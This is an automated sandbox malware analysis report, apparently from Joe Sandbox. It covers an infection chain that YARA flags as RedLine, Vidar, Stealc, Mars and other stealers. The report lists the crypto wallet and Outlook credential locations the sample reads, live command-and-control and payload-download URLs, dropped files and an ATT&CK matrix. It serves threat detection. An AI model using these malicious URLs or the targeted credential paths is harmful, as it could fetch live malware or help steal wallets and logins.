Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5g0.0.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\qbji, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811fbeb15.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811f449f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2042934542.000001487C95B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5d600c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\qbji, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7420, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5g0.0.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5g0.0.exe PID: 5408, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6BD40B40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC68EA0 sqlite3_clear_bindings,	1_2_6BC68EA0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD40D60 sqlite3_bind_parameter_name,	1_2_6BD40D60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD40C40 sqlite3_bind_zeroblob,	1_2_6BD40C40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC663C0 PR_Bind,	1_2_6BC663C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF22D0 sqlite3_bind_blob,	1_2_6BBF22D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC660B0 listen,WSAGetLastError,	1_2_6BC660B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	1_2_6BC6C050
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC66070 PR_Listen,	1_2_6BC66070
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC6C030 sqlite3_bind_parameter_count,	1_2_6BC6C030
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC66410 bind,WSAGetLastError,	1_2_6BC66410
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC69380 sqlite3_bind_int,	1_2_6BC69380
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC692E0 sqlite3_bind_double,	1_2_6BC692E0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	31 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
R0hb7jyBcv.exe	37%	Virustotal	Browse
R0hb7jyBcv.exe	32%	ReversingLabs
R0hb7jyBcv.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\qbji	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\u5g0.0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qbji	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	57%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\qbji	57%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\u5g0.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u5g0.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5g0.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SecureClient\relay.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
note.padd.cn.com	1%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/freebl3.dll$	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/vcruntime140.dllXqF~	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://91.215.85.66:9000t-dq	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	23%	Virustotal		Browse
http://91.215.85.66:	0%	Avira URL Cloud	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	9%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	13%	Virustotal		Browse
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dlln	0%	Avira URL Cloud	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76	10%	Virustotal		Browse
185.172.128.76/3cd2b41cbde8fc9c.php	13%	Virustotal		Browse
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php4	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Virustotal		Browse
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php4	2%	Virustotal		Browse
http://185.172.128.59/syncUpd.exe	23%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Virustotal		Browse
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	21%	Virustotal		Browse
http://185.172.128.203/tiktok.exe	20%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpQ	0%	Avira URL Cloud	safe
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpX	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	15%	Virustotal		Browse
http://91.215.85.66:9000	100%	Avira URL Cloud	malware
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08F	100%	Avira URL Cloud	malware
http://note.padd.cn.com/1/Package.zip	3%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.phpQ	7%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.phpX	7%	Virustotal		Browse
http://91.215.85.66:9000	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
iolo0.b-cdn.net	169.150.236.98	true	false		high
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse	unknown
svc.iolo.com	20.157.87.45	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	true	Avira URL Cloud: malware	unknown
http://185.172.128.228/BroomSetup.exe	false	23%, Virustotal, Browse Avira URL Cloud: safe	unknown
185.172.128.76/3cd2b41cbde8fc9c.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	low
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://note.padd.cn.com/1/Package.zip	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	false		high
